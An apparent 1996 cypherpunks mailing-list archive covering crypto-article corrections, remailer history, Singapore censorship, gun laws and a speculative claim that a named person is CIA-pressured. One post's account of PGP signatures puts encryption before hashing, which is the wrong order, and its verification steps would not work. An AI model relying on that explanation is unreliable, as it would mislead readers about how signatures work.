Key management is the biggest problem for the keys of symmetric
ciphers, not asymetric ciphers.

  In the asymmetrical model, users have a public key stored
  somewhere that is available. Should someone want to send an
  encrypted message, the sender locates the public key of the
  recipient, encodes the message, and sends it off. The receiver
  then uses a private key to decode the message. The private key
  is different from the public key, but they are mathematically
  linked so that the private key is capable of decoding the
  message.

Entirely correct.

  Public/private key exchange is the technique used by RSA Data
  Security Inc., which was recently sold to Security Dynamics
  Inc., in Bedford, Mass. RSA uses a technology that is actually
  an adaptation of the decade-old National Institute of Standards
  and Technology's peer-trust Data Encryption Standard (DES),
  still used in many products. DES is a method of grabbing random
  keys for each encryption task, rather than using the same key
  repeatedly. Cryptographers say that RSA solves some problems,
  such as the trust issue but generates others.

ACK! NO! RSA is an asymmetric cipher. DES is a symmetric
cipher. That's the only difference. How keys are managed is entirely
dependant on how the system is implemented. Anything can be assigned a
key "at random," by allowing a user's passphrase to be the key.

Now it seems like a good time to explain the way that PGP (and
Netscape's encryption system) works.

Asymmetric ciphers, such as RSA, are very slow. Their key management,
however, is very nice and flexible, which is why we like to use
them. In a system that requires flexible key management, a high level
of security, as well as decent performance, both symmetric and
asymmetric ciphers are used.

If Alice wants to send Bob a message in such a system (like PGP), she
simply composes her message, and tells her mailer to PGP-encrypt the
message. PGP will find Bob's public key (either from her key ring, or
from a database, perhaps, but it doesn't matter.) The message will
then be encrypted with a random SYMMETRIC key (in the case of PGP, it
will use the 128-bit-key IDEA cipher). That session key, then, will be
encrypted using Bob's public key, and both the session key and message
will be sent off (in one PGP encrypted message). Bob will see his mail
from Alice, and then his PGP will decrypt the session key, and apply
it to the encrypted message, yielding the plaintext: Alice's message.

So, in PGP, the MESSAGE is encrypted using a random session key (which
is symmetric.) The SESSION KEY, then, is encrypted using the
recipient's public key.

The rest of the article seems to be generally on track, but
certificates and signatures have been confused. A certificate is a
cryptographically secure message that states the identify of the
presenter. In that way, the analogy to a driver's license is
correct. A trusted third party issues the certificate.

A digital signature, however, is the cryptographic equivalent of
signing your name to something. For example, with PGP, I can digitally
sign an email message. PGP does this by taking the message, encrypting
it with my PRIVATE key, running the result of that through a secure
one-way function ("hash"), and attaching the result to the bottom of
the message. A user can then verify that the signature is legitimate
by applying my PUBLIC key to the message, and running the result back
through the hash, and comparing the two. If they match, the signature
is good, if not, something is amiss.

(PGP, naturally, handles all of this automatically.)

  Therefore, U.S. encryption vendors and corporations are
  forbidden from exporting and deploying versions that use more
  than a 40-bit key. However, companies in other countries, such
  as Japan, can freely sell encryption technology that uses the
  tougher 1,024-bit standard.

The two are being confused again. See my earlier note about comparable
keys.

If you have further questions, please feel free to contact me. If
there is interest, I would also be willing to write a series on how to
choose a cryptosystem.

I am very concerned about the state of cryptographic knowledge in the
industry. The area is vital for successful companies' IS departments
to understand, and understand well. Yet, the general level of
knowledge is abysmally low. I applaud efforts by InfoWorld to increase
coverage of this important topic, but I emphasize that the material
presented must be correct. Many vendors are currently offering
solutions they call secure. Without an understanding of how
cryptography works, an IS organization is completely unable to choose
between that which is good security and that which is snake oil.

A "snake oil FAQ" is being drafted, but is not yet available. In the
mean time, there are cryptography FAQs available from
ftp://rtfm.mit.edu/pub/usenet-by-group/sci.crypt/ 

- -- 
C Matthew Curtin                MEGASOFT, INC                Chief Scientist
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Have you encrypted your data today?

iQEVAwUBMireN36R34u/f3zNAQF+BQf/XD0fPYFuOQsd+u2k4zE1UpfZQKaP+SDw
RUhx6R7LnD0ZK5dA+seStvsLl+cvg5tu2wMzf9bniS7taj2DHwmu8MDWYwJPnQST
Iiti6XBAoFjCJYWaVghHQzVKw8vxlNC20LzyJ791PdabpUo5ztpf+AXVHGAfWaTg
F3ZNYWbbyxg81uxAnKMM/Li6NOKJhcE6nNO+eHUMFLciFki+mz/mOT45fUPs0R9y
4UYLQDvcSVAt246xSufwqbrSY/4dUB3A7KjYvbqWUjYRF/40c1h3K6h69dDnOR/8
SY+AZNnZSzQZbMbHNpjlJ+E71Yz+9Ppvgl6Eeo7oqa+PNeYW0W9GMQ==
=PS8M
-----END PGP SIGNATURE-----

---------------------------- end response ----------------------------

-- 
C Matthew Curtin                MEGASOFT, INC                Chief Scientist
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 3 Sep 1996 01:05:42 +0800
To: proff@suburbia.net (Julian Assange)
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <199609021023.UAA09571@suburbia.net>
Message-ID: <199609021354.JAA13057@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


> Examining in detail Dyson's interests it appears she maintains a
> sizeable and long-standing interest in Eastern European technology
> companies. She is also clearly very far to the right of the political
> spectrum (rampant capitalist would be putting it mildly). She also speaks
> Russian. 

And all these would certainly be excellent reasons to denounce her as an
enemy of liberty, now wouldn't they.

[CIA snip]

> "Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
>  may be the most  oppressive.  It may be better to live under  robber barons  
>  than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
>  sometimes sleep,  his cupidity may at some point be satiated; but those who  
>  torment us for own good  will torment us  without end,  for they do so with 
>  the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 

So what's wrong with her being an Evil Capitalist(tm) again?

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch."  -US Postal
spokeswoman, quoted in AP, 1/27/96. I don't know about you, but most people I
know who saw someone in uniform on their porch would pull out the shotgun...
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 3 Sep 1996 03:39:48 +0800
To: ichudov@algebra.com
Subject: Re: Bob Dole on Drugs
In-Reply-To: <199609011633.LAA30982@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.960902100632.9044E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


The Post also noted -- and this was buried inside in a short article -- 
that Clinton had stepped up his attacks on drugs during his acceptance 
speech, which I intentionally missed.

-Declan


On Sun, 1 Sep 1996 ichudov@algebra.com wrote:

> http://allpolitics.com/news/9608/31/radio.addresses/
> 
> ... snip ...
> 
>    Dole, who returned to Washington for Labor Day
>    weekend, also pledged to use the White House as a
>    bully pulpit to promote the "moral message"
>    against drugs and to criticize what he called the
>    entertainment industry's glamorization of drug use.
> 
>    On Sunday, he is to address the convention of the
>    National Guard Association of the United States
>    during which he's expected to propose that the
>    military be enlisted to assist in a renewed war on
>    drugs. 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Tue, 3 Sep 1996 02:44:25 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Mailboxes?
Message-ID: <199609021534.KAA26279@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi,

I have a thought for addressing the anon. problem.

We could create a network of anonymous remailers with mailboxes. All messages in the mailboxes are stored encrypted. No information about the users are keep. Users would be be given x K of mailbox space.

We could use PGP keys for encrypting the messages. Each user would have his own key pair for his anonymous mailbox. Any plain text messages received to the server would be encrypted on recept.

Let the government's subpoena away. :)

"Sorry we don't have user addresses, no I can't decrypt those messages Senator." <BEG>

What do you think?

- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMisGh49Co1n+aLhhAQHvAgP/aLktPSyoj3Ps7OnJ2LXlSIJJQq+B3GiA
TlGFJ/DZVF9Ai9rKMzjgmTiukLY/+Hf58vrw7QjJA7wp/fcGOZoYNnMt0mW09wsp
biUtXnMkX86sW2abtazy6U3f+DR15lGi9S2F0dvZERmFCdUX5Yi5geoa31Zezght
Sj/0sFT+AUk=
=7tw/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 03:51:40 +0800
To: cypherpunks@toad.com
Subject: Re: Sharp Knives
Message-ID: <ae506466010210047a73@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:38 PM 9/2/96, Dave Harman OBC wrote:

>In California, it's a felony to merely *own* a Ninja star.  It's a
>felony to carry a *concealed* knife, but carrying it openly in a
>holster is legal.  It's a felony for most people to carry a
>concealed loaded handgun on the street only on a *second* offense.
>It'a a felony to merely *own* a switchblade, brass knuckles, etc.
>Do our weapons laws sound strange?  Are many of our weapons laws
>stricter than countries like Sweden?  Yes!

Most laws about knives, dirks, daggers, brass knuckles, saps, etc. were
devised to control the coloreds, who could not afford the weapons of choice
of whites and other gentlemen.

Hence, a colored who gets picked up on some charge, or detained, can be
jailed on a felony charge for having a pocketknife, or a sap, or brass
knucks. Coloreds from Asia can be jailed for having the martial arts sorts
of weapons.

A white gets a misdemeanor charge for carrying a gun.

(This analysis is not original with me. The gun magazines have noted the
racist origins of misdemeanor/felony dichotomies for many years. One
article I read a few years ago traced the precise times at which these laws
came into being...mostly the times in various states corresponded with
periods of high immigration of coloreds to major cities.)

Here in California there's a bill pending in the legislature which would
decriminalize the carrying of a pocketknife that can be opened with one
hand (a la the Spyderco, Benchmade, Buck, Cold Steel, etc., knives with
thumb holes or studs). Even though such knives are openly sold in every
sporting goods store I have ever been in, and are carrried by a truly large
fraction of the population, such knives are currently classified as
"switchblades" and can be prosecuted as a felony. A good way to selectively
harasss someone. Interestingly, it was the District Attorneys lobbying
group in California which made the difference: they argued that such laws
are unenforceable or are selectively enforced.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Carper <ccarper@microsoft.com>
Date: Tue, 3 Sep 1996 03:49:58 +0800
To: "'cypherpunks@toad.com>
Subject: desubscribe
Message-ID: <c=US%a=_%p=msft%l=RED-78-MSG-960902172601Z-20683@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


desubscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 04:06:27 +0800
To: cypherpunks@toad.com
Subject: Censorpore as a Terror State
Message-ID: <ae50691b02021004958e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:29 AM 9/2/96, Bill Stewart wrote:

>While Tim's article title was clearly intended to be provocative,

Indeed, I write many things to be _provocative_. Not to be insulting, but
to challenge orthodoxies. And when I hear mealy-mouthed platitudes along
the lines of "foreigners do not understand the special needs of our nation,
and do not understand why Benevolent Father Yew channels our thoughts in
more productive directions," I have to call a spade a spade.

(quoting James Seng)

>>In addition, you need to see the method of censorship deployed in
>>Singapore. For press media like papers and magazine, it is done in a
>>passive manner. They _do not_ read every issue of every magazine available
>>in Singapore. They only do so when there is enough complains.
>
>This also means you don't know what is safe to print and what isn't.
>You have to restrict yourself very strongly, because otherwise
>some politically influential person will complain to the government,
>and you go to jail.  At least if the government tells you what
>the rules are, you know it's safe to say things that don't violate them.

Yes, what James Seng calls a "passive manner" is often worse than
censorship in a direct manner. Psychologists would mention "random
reinforcement" at this point. When there is _direct_ censorship, with
clearly defined rules, publishers will skate as close to the edge of the
envelope as they can, and even test the limits. When there is _passive_ or
_vague_ censorship, with rules not carefully spelled out but with the
possibility of prosecution and jail time always looming, then publishers
and others will rein themselves in, taking the cautious route. This is, of
course, often the result desired, that people invoke "the policeman inside"
(to use the Burroughs term).

This is really the essence of a "terror state." The rules are not known,
the fear of a knock on the door is omnipresent, and the Beloved Ruler may
dispatch his enforcers on a whim.


>>ps: Sorry for the off-topic discussion.
>
>It's not off-topic.  Building tools to prevent censorship is
>distinctly on-topic for cypherpunks, and an occasional digression into
>whether it's a good idea is worthwhile.

Exactly. A discussion of routing-around Censorpore's policies is at least
as on-topic as the 17th discussion of some snake oil cipher.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 04:16:35 +0800
Subject: Re: Free Speech and List Topics
In-Reply-To: <ae4fcb1f0002100476d7@[207.167.93.63]>
Message-ID: <199609021759.KAA00489@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 5:17 AM 9/2/96, qut wrote:
! 
! >About the need for limits for anonymity, guess what brought that on?
! >Crime?  Yes!  The crime of the media monopoly violating the anti-trust
! >acts, because people are ignorant enough to trust the mass media for
! >their news.

I just mean to throw the media's lies right back at them.  If crypto
anonymity is considered to lend itself to crime, no doubt by the same
logic, mass media collusion lends itself to crime.

And American mass media collusion IS a crime, crypto anonymity is not.
It's been a hundred years since it became illegal to violate the Sherman
Anti-Trust Act.

! No self-respecting Cypherpunk thinks the Antitrust Act and related acts are
! worthy of enforcement.
! 
! (Think of how the technology we support will tend to allow new avenues for
! price collusion, interlocking directorates, new forms of business combines,
! unreadable secure communications with foreign competitors, and so on, all
! things the Antitrust regulators are already growing worried about.)

And should!  No doubt the media is colluding for criminal purposes and
shady outfits like The New York Times should be seized and analysed
by Department Of Justice anti-trust invesigators.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 04:19:45 +0800
To: cypherpunks@toad.com
Subject: The Earliest CP Remailer *DID* Emphasize Anonymity
Message-ID: <ae506d03030210048089@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:22 AM 9/2/96, Bill Stewart wrote:

>>From what I know of remailer history, the main original goal
>of the cypherpunks-style remailer was to provide
>security against traffic analysis by eavesdroppers, rather than to
>prevent the recipient from knowing the sender's address, though
>everybody pretty quickly realized that the latter was an interesting
>feature, especially coupled with posting to Usenet.

No, the focus was at _least_ as much on providing anonymity as on
protection from eavesdroppers or traffic analysts. More so, actually.

How do I know this? Well, I was the one who did the presentation on
Chaumian mixes at the first meeting, describing them as remailers and using
paper envelopes-within-envelopes to illustrate the concept.

Later that day, in the "Crytpo Anarchy Game" we played to educate the
attendees, remailers were used to post anonymous offers of goods and
services, to make contact in message pools, and to generally implement a
crypto-anarchic, distributed system. (With some obvious flaws, stalls, and
other weirdnesses.) Still, it embodied most of what we see today (and a lot
more that we still haven't managed to implement).

The next afternoon, Hugh Daniel, Eric Hughes, and I went out for some
bagels and talked about what had been learned. Either Hugh or Eric had the
idea of coding up the remailer in C or Perl. As it turned out, Eric was the
one to do it, a few weekends later, using Perl (which he learned enough of
on Saturday to then do on Sunday). The first remailer was put for use and
immediately began to be used for anonymous postings.

And all of the early uses were explicitly to anonymize the sender, not to
deter eavesdropping (which conventional crypto works well for, anyway).

The Kleinpaste-style remailer was in a nascent stage, and Julf was running
one on his site. But we all knew the longterm advantages of chained
remailers, and, of course, even the very first Hughes remailer supported
arbitrary chaining. And we also knew of the central defect of the
Kleinpaste-style anonymizer, that law enforcement would seek the records
through subpoena. As it turned out, penet lasted longer than I for one
thought it would.

PGP encryption was added soon after to the Hughes-style remailer, by Hal
Finney, as I recall. Later developments, by Matt Ghio, Lance Cottrell,
etc., added to the capabilities.

So, the anonymizing and arbitrary chaining (which is for protection against
collusion of the remailers and subpoenas of logs) features were there from
the start. Even before the start, as the "Crypto Anarchy Game" had them.

(I've been clear that it was Eric Hughes who coded the first Perl version,
but I feel I have to make my own role clear. There are some critics of me
here on this list who have claimed "Tim has never done a thing for
Cypherpunks except talk." Well, besides organizing the first meeting with
Eric, and giving the morning talk on the topics mentioned, and
demonstrating the role of mixes and digital cash, and writing articles on
many topics, and setting up BlackNet (which actually works, and is not just
an idea), and on and on, I'm satisfied with my contributions. Your mileage
may vary.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 3 Sep 1996 02:56:30 +0800
To: pjb@23kgroup.com (Paul J. Bell)
Subject: Re: Moscowchannel.com hack
In-Reply-To: <9609021545.AA15755@23kgroup.com>
Message-ID: <199609021606.LAA06211@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Paul J. Bell wrote:
> 
> FWIW, not even root can unmount a file system that is busy.
> 
> 	-paul

Well, root can kill all processes that use the mounted directory.

igor


> 
> > From cypherpunks-errors@toad.com Sun Sep  1 18:17:12 1996
> > Subject: Re: Moscowchannel.com hack
> > To: snow@smoke.suba.com (snow)
> > Date: Sun, 1 Sep 1996 10:09:32 -0500 (CDT)
> > Cc: joelm@eskimo.com, Cypherpunks@toad.com
> > Reply-To: ichudov@algebra.com (Igor Chudov)
> > From: ichudov@algebra.com (Igor Chudov @ home)
> > X-No-Archive: yes
> > Organization: Bool Sheet Software
> > X-Mailer: ELM [version 2.4 PL24 ME7]
> > Content-Type> : > text> 
> > Sender: owner-cypherpunks@toad.com
> > Content-Length: 689
> > 
> > snow wrote:
> > > 
> > > On Sat, 31 Aug 1996, Joel McNamara wrote:
> > > 
> > > > Not really crypto, but related to the DOJ hack in a way.
> > > > 
> > > > Moscow Channel is a pretty slick, Russian news/commentary page.  Their Web
> > > > site was hacked and altered by someone who didn't seem to like Russians all
> > > > Just a matter of time before some builds a dedicated Satan type tool that
> > > > scans for  HTTP server holes or messed up file permissions to make locating
> > > > potential victims easy.
> > > Write your web site to a CD-ROM and hard-code the base directory into the
> > > webserver.
> > 
> > A hacker who has root can forcibly unmount the cdrom and mount another
> > directory on that node. Not a good solution.
> > 
> > 	- Igor.
> > 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 04:23:58 +0800
Subject: Re: Sharp Knives
In-Reply-To: <199609021720.MAA06616@manifold.algebra.com>
Message-ID: <199609021809.LAA01872@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! How do these Ninja stars work anyway?
! 
! I've heard about them, but do not know much.

I don't know either, they're as illegal to own as it is to rip off a car!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 3 Sep 1996 02:33:28 +0800
To: cypherpunks@toad.com
Subject: Re: PLEASE Nuke Singapore Back into the Stone Age
Message-ID: <2.2.32.19960902151654.00abd6ac@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:51 PM 9/1/96 -0700, Timothy C. May wrote:

>Who says this has anything to do with "American ideology"? The Usenet is
>propagated around the world. All we are saying is that honest commentary on
>the corruption of Lee Kwan Yew (and his billion dollars in Australian and
>European banks) will be reported on the Usenet.
>
>This is not "imposing American ideology" on anyone. 

Didn't you know that TCP/IP was an attempt by American Intelligence Agencies
in concert with Britain to impose Anglo-American values (free trade in goods
and bits) on the poor Mittel Europeans and the followers of Confucius in the
East.  These sinister British-American conspirators had done so well with
their earlier releases of blue jeans, Rock and Roll, and Coca Cola.  TCP/IP
was designed to be the final blow to Central Europe and Asia in a culture
ware that has dominated this century.

Pretty sneaky those Anglo Saxons.

DCF

"Course if Mittel Europeans and Confucians hadn't murdered 100 million
people or so in the 20th century, perhaps we could feel sorry for them."
(The US-UK alliance only murdered a few million mostly via mass bombing of
civilians during WWII.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com
Date: Tue, 3 Sep 1996 02:19:16 +0800
To: cypherpunks@toad.com
Subject: Re: American Imperialism, Firing Squads, and the Vincennes Shootdown
In-Reply-To: <ae4f950802021004b956@[207.167.93.63]>
Message-ID: <199609021514.LAA12830@mail2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May) wrote:

> At 1:03 AM 9/2/96, Alan Horowitz wrote:
> >The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.
> >
> >If my memory serves, the Iranian jetliner had its squawker turned off, or
> >broken. The officer in charge in the CIC had about ten seconds to decide
> >if he was about to be locked-on by a missle. And no real information to
> >make the decision with.
> 
> The U.S.S. Vincennes shot down an Iranian commercial airliner that was in
> its normal and well-known flight path out of Bandar Abbas. <...>
> 
> As to the "squawker" being turned off, this is not my recollection of the
> case (though it was nearly a decade ago, so memories fade...).

   If memory serves, the disinfo campaign following the Airbus incident
put much emphasis on the plane's (allegedly) erratic, seemingly hostile
behavior: it was said to be menacing a specific US ship in the convoy. It
later turned out, I think, that the ship being menaced was a radar ghost
fabricated by the Vincennes's AEGIS system.

\t




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edyson@edventure.com (Esther Dyson)
Date: Tue, 3 Sep 1996 02:39:37 +0800
To: Julian Assange <unicorn@schloss.li (Black Unicorn)
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <19960902152515012.AAA179@Esther.edventure.com>
MIME-Version: 1.0
Content-Type: text/plain


At least you don't accuse me of being a Communist.  For the record, I am not
a tool of the CIA nor have they pressured me, but there's no reason for you
to believe me.  

Esther Dyson 

At 08:23 PM 9/2/96 +1000, Julian Assange wrote:

SNIP ---

>
>Examining in detail Dyson's interests it appears she maintains a
>sizeable and long-standing interest in Eastern European technology
>companies. She is also clearly very far to the right of the political
>spectrum (rampant capitalist would be putting it mildly). She also speaks
>Russian. I'm not saying she has been working for the CIA for the past
>decade, but I would be very surprised if the CIA has not exerted quite
>significant pressure (which they are easily able to do given the
>location of many of Dyson's assets) in order to bring her into their
>folds during that time period.
>
>-- 
>"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
> may be the most  oppressive.  It may be better to live under  robber barons  
> than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
> sometimes sleep,  his cupidity may at some point be satiated; but those who  
> torment us for own good  will torment us  without end,  for they do so with 
> the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
>+---------------------+--------------------+----------------------------------+
>|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
>|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
>|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
>+---------------------+--------------------+----------------------------------+
>

Esther Dyson				Always make new mistakes!
EDventure Holdings
<edyson@edventure.com> 
1 (212) 924-8800
1 (212) 924-0240 fax
104 Fifth Avenue
New York, NY 10011 USA 
www.edventure.com
High-Tech Forum in Lisbon, October 27-29, 1996
PC Forum in Tucson, Arizona, March 23-26, 1997





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 05:05:40 +0800
Subject: Re: Silenced Machine Guns Are Safer Than TWA
Message-ID: <199609021837.LAA05216@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Skippy) wrote:

! At 4:33 AM 9/2/96, qut@netcom.com (Net God) wrote:
! 
! >Contrary to popular fiction, ALL firearms have been permanently
! >registered since the 1968 Gun Control Act.  The media monopoly lies when
! >they say the contrary.
! 
! Nope. Gun sales between individuals without any paperwork were fully legal
! in some places until recently (and may still be fully legal...I can only
! speak of California).

So?  I was talking about NEW sales of firearms from license holders.  Let's
consider improving the future rather than preserving the past, shall
we?

! >From 1974 until a couple of years ago, I bought and sold a dozen or more
! rifles, handguns, and even Evil Assault Weapons, mostly through fully legal
! gun shows. I even sold a .357 Smith to some guy, made a joke about how
! great these gun shows were and how great it was to be able to just take
! cash and hand over a gun without any paperwork...the guy laughed and said
! he was a San Jose cop. I felt nervous for a few seconds, but quickly
! realized there was no law *I* was breaking, so I laughed too.
! 
! Most of these guns I kept no records on, nor did any laws say I had to.
! 
! (A few years ago it became necessary for even private citizen-units to
! obtain the proper firearms transfer papers from the gubment. I wanted to
! sell a laser-equipped Heckler & Koch SP-89 without creating a paper trail
! (as I'd not had one when I acquired the piece a few years earlier), so a
! friend of mine used his friendly neighborhood libertarian FFL dealer, who
! has a policy that the stack of transfer forms he is required to keep on
! file will mysteriously burn up if the Feds ever seek out his records. (Who
! knows if he'll abide by this policy, but the point is that there are
! literally tens of thousands of these "kitchen table FFL dealers," and no
! computerized filing of records. This is one reason I quit the NRA: they are
! advocating the "instant check." Such an instant check would mean massive
! computerization of all files, and of course cross-referencing to files on
! citizens. This would be much worse than the "paper chaos" of stacks of
! firearms paperwork sitting in dusty filing cabinets. I'll take a 10-day
! ineffectual waiting period to a Big Brother database of all purchasers.)

So you'ld prefer the security of obscurity?  I'd prefer to have much more 
government protected rights, openly.  Do you belive the civil courts
have a role in protecting people's rights?  If so, then "government
protected rights."

! >BTW, I muse that the issue of guns, drugs and censorship make an
! >excellent litmus test for libertarians: either you support the
! >legalization of, all of, or your a fake.
! 
! I'm not sure what the "legalization of censorship" would mean, though I
! support the right of anyone to screen out what they choose not to read or
! view. And I support the right of companies to decide what materials to buy,
! have viewed by employees, etc. (So if the "Valley Lesbigays" want to show a
! tape at Hewlett-Packard, H-P can just say "Nope--we're not interested.)
! 
! I fully support legalization of all drugs, all guns, and am unalterably
! opposed to any form of government censorship.

I meant the good side of the censorship issue!

But I also support enforcement of the anti-trust laws, so some would view
the court enforced break up of illegal collusion of the media to crush
competition as "government censorship."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@23kgroup.com (Paul J. Bell)
Date: Tue, 3 Sep 1996 02:48:41 +0800
To: ichudov@algebra.com
Subject: Re: Moscowchannel.com hack
Message-ID: <9609021545.AA15755@23kgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


FWIW, not even root can unmount a file system that is busy.

	-paul

> From cypherpunks-errors@toad.com Sun Sep  1 18:17:12 1996
> Subject: Re: Moscowchannel.com hack
> To: snow@smoke.suba.com (snow)
> Date: Sun, 1 Sep 1996 10:09:32 -0500 (CDT)
> Cc: joelm@eskimo.com, Cypherpunks@toad.com
> Reply-To: ichudov@algebra.com (Igor Chudov)
> From: ichudov@algebra.com (Igor Chudov @ home)
> X-No-Archive: yes
> Organization: Bool Sheet Software
> X-Mailer: ELM [version 2.4 PL24 ME7]
> Content-Type> : > text> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 689
> 
> snow wrote:
> > 
> > On Sat, 31 Aug 1996, Joel McNamara wrote:
> > 
> > > Not really crypto, but related to the DOJ hack in a way.
> > > 
> > > Moscow Channel is a pretty slick, Russian news/commentary page.  Their Web
> > > site was hacked and altered by someone who didn't seem to like Russians all
> > > Just a matter of time before some builds a dedicated Satan type tool that
> > > scans for  HTTP server holes or messed up file permissions to make locating
> > > potential victims easy.
> > Write your web site to a CD-ROM and hard-code the base directory into the
> > webserver.
> 
> A hacker who has root can forcibly unmount the cdrom and mount another
> directory on that node. Not a good solution.
> 
> 	- Igor.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 2 Sep 1996 14:02:33 +0800
To: ichudov@algebra.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <199609020116.UAA01684@manifold.algebra.com>
Message-ID: <Pine.LNX.3.91.960902103728.10553B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996 ichudov@algebra.com wrote:

> James Seng wrote:
> > 
> > On Sat, 31 Aug 1996, Timothy C. May wrote:
> > > The point is to make clear to them that the Usenet and similar Web sites
> > > are global in nature, not subject to censorship without a very high local
> > > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
> > > Singaporans will have to choose not to carry the various newsgroups into
> > > which *I* post such messages!
> > 
> > Just let to add my comment in regard to this unforuntate discusssion.
> > 
> > To understand the sitution better, you should not impose America 
